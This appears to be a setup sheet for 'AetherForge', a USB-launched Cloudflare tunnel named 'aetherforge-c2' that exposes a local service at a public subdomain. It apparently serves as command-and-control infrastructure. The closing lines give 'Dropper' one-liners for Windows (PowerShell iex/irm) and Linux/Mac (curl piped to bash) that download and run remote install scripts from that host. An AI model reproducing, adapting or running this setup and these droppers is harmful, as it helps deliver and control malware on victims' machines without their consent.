======================================================== AetherForge — Cloudflare Tunnel One-Time Setup Target hostname: killa.thetempleofdoom.com ======================================================== You only do this ONCE on any machine that has cloudflared. After that, drop credentials.json in this folder and the USB launcher handles everything automatically forever. STEP 1 — Install cloudflared Run LAUNCH.bat once — it will install cloudflared from the bundled MSI automatically. OR: msiexec /i cloudflared-windows-amd64.msi STEP 2 — Authenticate with your Cloudflare account cloudflared tunnel login (Opens browser — log in, select thetempleofdoom.com) This saves a cert.pem to %USERPROFILE%\.cloudflared\ STEP 3 — Create the named tunnel cloudflared tunnel create aetherforge-c2 Note the Tunnel ID printed (UUID format). STEP 4 — Route your subdomain to the tunnel cloudflared tunnel route dns aetherforge-c2 killa.thetempleofdoom.com (Adds CNAME: killa -> .cfargotunnel.com in your CF DNS) STEP 5 — Copy credentials to this USB folder The credentials JSON is at: %USERPROFILE%\.cloudflared\.json Copy it to this folder, overwriting credentials.json: copy %USERPROFILE%\.cloudflared\.json cloudflare\credentials.json STEP 6 — Done From now on LAUNCH.bat detects the credentials, writes a fresh config.yml automatically, and starts the tunnel. The tunnel always connects to 127.0.0.1:8989 (localhost) regardless of which network the machine is on. ======================================================== Tunnel URL after setup: https://killa.thetempleofdoom.com Dashboard: https://killa.thetempleofdoom.com Dropper (Windows): iex (irm 'https://killa.thetempleofdoom.com/install.ps1') Dropper (Linux/Mac): curl -sL https://killa.thetempleofdoom.com/install.sh | bash ========================================================